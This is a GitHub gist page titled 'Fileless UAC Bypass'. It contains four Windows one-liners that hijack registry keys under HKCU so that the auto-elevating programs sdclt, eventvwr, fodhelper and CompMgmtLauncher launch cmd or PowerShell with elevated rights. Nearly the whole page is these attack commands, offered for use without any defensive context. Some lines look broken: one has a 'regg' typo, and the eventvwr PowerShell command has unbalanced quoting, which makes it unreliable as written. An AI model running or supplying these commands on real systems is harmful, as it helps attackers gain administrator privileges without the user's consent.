Skip to content

Instantly share code, notes, and snippets.

@Malayke
Forked from initpwn/.bat
Created November 25, 2018 04:49
Show Gist options
  • Save Malayke/538c5c5a574dda796a000721f040b349 to your computer and use it in GitHub Desktop.
Save Malayke/538c5c5a574dda796a000721f040b349 to your computer and use it in GitHub Desktop.
Fileless UAC Bypass
#sdclt fileless UAC bypass
regg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
#eventvwr fileless UAC bypass
%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec;
#fodhelper fileless UAC bypass
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
#CompMgmtLauncher fileless UAC bypass
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /d "'cmd.exe'" /f && %windir%\\System32\CompMgmtLauncher.exe
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment